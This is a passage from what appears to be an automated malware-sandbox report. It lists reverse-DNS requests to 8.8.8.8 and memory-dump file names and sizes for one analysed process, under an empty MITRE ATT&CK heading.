    146 B
    1
    1

    DNS Request

    26.165.165.52.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    73.144.22.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    73.144.22.2.in-addr.arpa

  • 8.8.8.8:53
    13.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    13.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Downloads

  • memory/1568-0-0x00007FFE3E623000-0x00007FFE3E625000-memory.dmp

    Filesize

    8KB

  • memory/1568-1-0x0000000000460000-0x0000000000470000-memory.dmp

    Filesize

    64KB

  • memory/1568-2-0x00007FFE3E620000-0x00007FFE3F0E1000-memory.dmp

    Filesize

    10.8MB

  • memory/1568-6-0x00007FFE3E620000-0x00007FFE3F0E1000-memory.dmp

    Filesize

    10.8MB
